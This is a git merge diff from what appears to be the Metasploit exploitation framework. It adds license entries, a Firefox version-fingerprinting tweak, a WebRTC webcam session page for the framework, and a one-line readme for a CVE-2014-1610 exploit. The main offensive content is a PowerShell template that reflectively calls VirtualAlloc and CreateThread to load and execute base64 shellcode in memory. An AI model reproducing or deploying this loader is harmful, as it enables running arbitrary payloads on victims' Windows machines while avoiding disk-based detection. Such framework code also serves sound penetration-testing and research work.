Merge remote-tracking branch 'upstream/master'

LICENSE

@@ -15,6 +15,10 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #
 
+Files: data/templates/to_mem_pshreflection.ps1.template
+Copyright: 2012, Matthew Graeber
+License: BSD-3-clause
+
 Files: data/john/*
 Copyright: 1996-2011 Solar Designer.
 License: GPL-2
@@ -147,6 +151,11 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause
 
+Files: data/webcam/api.js
+Copyright: Copyright 2013 Muaz Khan<@muazkh>.
+License: MIT
+
+
 #
 # Gems
 #

data/exploits/cve-2014-1610/readme.md

@@ -0,0 +1 @@
+Any DjVu file can be used this is just a snazzy Metasploit one

data/js/detect/os.js

@@ -213,7 +213,9 @@ window.os_detect.getVersion = function(){
 		// Thanks to developer.mozilla.org "Firefox for developers" series for most
 		// of these.
 		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
-		if (css_is_valid('image-orientation',
+		if (css_is_valid('cursor', 'cursor', 'grab')) {
+			ua_version = '27.0';
+		} else if (css_is_valid('image-orientation',
 		                 'imageOrientation',
 		                 '0deg')) {
 			ua_version = '26.0';

data/templates/scripts/to_mem_pshreflection.ps1.template

@@ -0,0 +1,27 @@
+function %{func_get_proc_address} {
+	Param ($%{var_module}, $%{var_procedure})		
+	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+
+	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+}
+
+function %{func_get_delegate_type} {
+	Param (
+		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+	)
+
+	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+
+	return $%{var_type_builder}.CreateType()
+}
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null

data/webcam/answerer.html

@@ -0,0 +1,193 @@
+<html>
+<head>
+<title>webcam_chat</title>
+<style type="text/css">
+	div.container {
+		position: relative;
+	}
+
+	div.windowa {
+		height: 480px;
+		width: 640px;
+		border-radius: 15px;
+		-moz-border-raidus: 15px;
+		background-color: black;
+		position: absolute;
+		left: 50;
+		padding : 10px;
+		margin-left: auto;
+		margin-right: auto;
+		text-align: center;
+		vertical-align: middle;
+		color: white;
+	}
+
+	div.windowb {
+		height: 180px;
+		width: 200px;
+		border-radius: 15px;
+		-moz-border-raidus: 15px;
+		background-color: #9B9B9B;
+		position: absolute;
+		top: 480;
+		left: 470;
+		padding: 10px;
+		margin-left: auto;
+		margin-right: auto;
+		text-align: center;
+		vertical-align: middle;
+	}
+
+	div.windowc {
+		position: absolute;
+		top: 510;
+		left: 80;
+		height: 150px;
+		width: 380px;
+		color: red;
+	}
+
+	div.footer {
+		position: fixed;
+		bottom: 0;
+		width: 100%;
+		padding: 10px;
+	}
+
+	video.peer {
+		position: absolute;
+		top: 15;
+		left: 10;
+	}
+
+	video.self {
+		position: absolute;
+		top: 5;
+		left: 10;
+	}
+</style>
+<script src="=WEBRTCAPIJS="> </script>
+<script>
+	window.onerror = function(e) {
+		document.getElementById("message").innerHTML = "Error: " + e.toString();
+	}
+
+	window.onload = function() {
+		document.getElementById("message").innerHTML = "Waiting for the session. When the session arrives, you must manually allow the webcam to run in order to join the session."
+	}
+
+	var channel = '=CHANNEL=';
+	var websocket = new WebSocket('ws://=SERVER=');
+	var inSession = false;
+
+	websocket.onopen = function() {
+		websocket.push(JSON.stringify({
+			open: true,
+			channel: channel
+		}));
+	};
+
+	websocket.push = websocket.send;
+	websocket.send = function(data) {
+		websocket.push(JSON.stringify({
+			data: data,
+			channel: channel
+		}));
+	};
+
+	var peer = new PeerConnection(websocket);
+	peer.onUserFound = function(userid) {
+		if (inSession) {
+			console.debug("Already in session, will not send another participation request");
+			return;
+		};
+
+		userid = "=OFFERERID=";
+
+		getUserMedia(function(stream) {
+			peer.addStream(stream);
+			peer.sendParticipationRequest(userid);
+			inSession = true;
+			document.getElementById("message").innerHTML = "Session is now active.";
+		});
+	};
+
+	peer.onStreamAdded = function(e) {
+		var video = e.mediaElement;
+		if (e.userid == 'self') {
+			video.controls = true;
+			video.setAttribute('width', 200);
+			video.setAttribute('height', 190);
+			video.setAttribute('controls', false);
+			video.setAttribute('class', 'self');
+			document.getElementById("windowb").appendChild(video);
+		}
+		else {
+			video.controls = true;
+			video.setAttribute('width', 640);
+			video.setAttribute('height', 460);
+			video.setAttribute('controls', false);
+			video.setAttribute('class', 'peer');
+			document.getElementById("windowa").appendChild(video);
+		}
+		video.muted = false;
+		video.volume = 0.5;
+		video.play();
+	};
+
+	peer.onStreamEnded = function(e) {
+		var video = e.mediaElement;
+		if (video) {
+			video.style.opacity = 0;
+			setTimeout(function() {
+				video.parentNode.removeChild(video);
+			}, 1000);
+		}
+		document.getElementById("message").innerHTML = "The video session has ended.";
+	};
+
+	function getUserMedia(callback) {
+
+		var hints = {audio:true,video:{
+			optional: [],
+			mandatory: {
+				minWidth: 1280,
+				minHeight: 720,
+				maxWidth: 1920,
+				maxHeight: 1080,
+				minAspectRatio: 1.77
+			}
+		}};
+
+		navigator.getUserMedia(hints,function(stream) {
+			var video = document.createElement('video');
+			video.src = URL.createObjectURL(stream);
+
+			peer.onStreamAdded({
+				mediaElement: video,
+				userid: 'self',
+				stream: stream
+			});
+
+			callback(stream);
+		});
+	}
+</script>
+</head>
+<body>
+
+<div class="container">
+	<div class="windowa" id="windowa">
+	</div>
+	<div class="windowb" id="windowb">
+	</div>
+	<div class="windowc">
+		<b>Session status (=RHOST=):</b><p></p>
+		<span id="message"></span>
+	</div>
+</div>
+<div class="footer">
+	<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center>
+</div>
+</body>
+</html>